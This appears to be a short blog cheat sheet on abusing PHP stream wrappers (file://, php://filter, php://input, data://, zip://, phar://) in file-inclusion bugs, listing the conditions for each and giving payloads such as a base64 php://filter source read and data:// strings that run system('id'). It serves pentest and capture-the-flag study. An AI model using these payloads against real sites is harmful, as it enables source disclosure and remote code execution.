Exploit with PHP Protocols / Wrappers

不畏将来,不念过往。如此,安好!

Someone famous 丰子恺
wrapper or protocol  controllable function allow_url_include vulnerability type  remark
 file:// - off LFI/File Manipulation 
 glob:// - off Directory Traversal 
 php://filter/read include offFile Disclosure

 php://filter/read=convert.base64-encode/resource=index.php

 php://filter/write file_put_contents off Encoding file_put_contents("php://filter/write=string.rot13/resource=x.txt","content");
 php://input include onRCE  Encoding is required while reading .php source: <?php echo base64_encode(file_get_contents("solution.php"));?> OR just use <?php system('cat x.php');?>
data://  include on RCE data:text/plain,<?php system("id")?> OR data:text/plain;base64,PD9waHAgc3lzdGVtKCJpZCIpPz4=
 zip:// include/uploaded file off RCE 
 phar:// include/uploaded fileoff  RCEPHP version >= 5.3 


标签

注意!

Warning! 关注一下!